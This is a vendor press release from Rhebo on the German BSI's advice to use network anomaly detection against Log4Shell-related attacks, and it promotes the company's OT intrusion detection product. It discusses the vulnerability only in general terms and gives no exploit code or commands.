Why the BSI recommends anomaly detection to identify Log4Shell-related attacks
Fast and complete security patching unlikely
»Naturally, the first priority is to update all existing Log4j libraries in the company to the most recent version. However, many companies are thus embarking on the proverbial search for the needle in the haystack,« said Rhebo CTO Martin Menschner. Companies often lack clarity over which applications use the vulnerable library. Moreover, as the BSI explicitly points out, it is not sufficient to update the Log4j library via the global software management of operating systems. They stress the point that only the respective »software manufacturers who have integrated the library into their programs [can] carry out the update.« The resulting mitigation complexity is further complicated by the fact that Log4j has already been updated several times since the vulnerability became known.
In addition, according to the BSI, all known mitigation measures that affect the use of the library are currently based on disabling the problematic functionality. Systems in companies that are absolutely dependent on the functionality of the Log4j library thus run the risk of no longer being functional after implementation. Particularly companies providing critical services, for example critical infrastructures and industrial companies, find themselves in a catch-22 situation.
In addition, companies should not be lulled into a sense of security even after an update. »The Log4Shell vulnerability could already have been exploited in some companies. This means that adversaries might have already compromised IT or – via lateral movement – Operational Technology (OT) networks and established access via backdoors,« adds Martin Menschner. After all, the vulnerability has existed for over a year. And security organizations worldwide have observed a massive increase in network scans and attacks since Log4Shell officially became known in December 2021 (see also Rhebo’s commentary on Log4Shell).
Anomaly detection should be a priority
For these reasons, the BSI recommends that organizations immediately implement enhanced measures to detect suspicious and malicious communications. In addition to the evaluation of request data (e.g., via web server logs), the BSI explicitly mentions anomaly detection at the network level. »This solution not only detects previously unknown attack patterns typical of zero-day vulnerabilities,« added Martin Menschner. »It also reports operations that indicate existing compromises, such as lateral movement, scans, change of functions and command structures in systems.« Rhebo’s Next Generation OT Intrusion Detection offers a solution tailored specifically to Operational Technology networks and Industrial Control Systems.
The OT Monitoring observes all communication within an industrial network, while the integrated Threat and Intrusion Detection identifies any anomaly, i.e. deviation, in the communication behavior and reports it in real time. It detects any communication that is novel or unusual in the monitored network and indicative of malicious behavior – from backdoor communications, lateral movement and spoofing activities to direct interference with industrial processes. With anomaly detection, actions of adversaries within the OT network become visible, traceable, and can be mitigated in real time, even if they use previously unknown signatures or have hijacked authenticated user accounts. To get anomaly detection up and running quickly, Rhebo offers on-demand technical operational support as well as a comprehensive managed protection service. To assess the risk of whether a network compromise has already occurred, an OT risk assessment and security analysis is also recommended.
For more information on the Rhebo OT anomaly detection please visit https://rhebo.com/en/our-products/rhebo-industrial-protector/.
Rhebo develops and markets innovative industrial monitoring solutions and services for energy suppliers, industrial companies and critical infrastructures. The company enables its customers to guarantee both cybersecurity and the availability of their OT and IoT infrastructures and thus master the complex challenges of securing industrial networks and smart infrastructures. Since 2021, Rhebo is part of the Landis+Gyr AG, a leading global provider of integrated energy management solutions for the energy industry with around 5,000 employees in over 30 countries worldwide.
Rhebo is a partner of the Alliance for Cyber Security of the Federal Office for Information Security and is actively involved in Teletrust – IT Security Association Germany and Bitkom Working Group on Security Management for the development of security standards. https://rhebo.com/
Rhebo GmbH
Spinnereistr. 7
04179 Leipzig
Telefon: +49 (341) 393790-180
Telefax: +49 (341) 393790-0
http://www.rhebo.com
Public Relations
Telefon: +49 (341) 393790191
E-Mail: jens.pacholsky@rhebo.com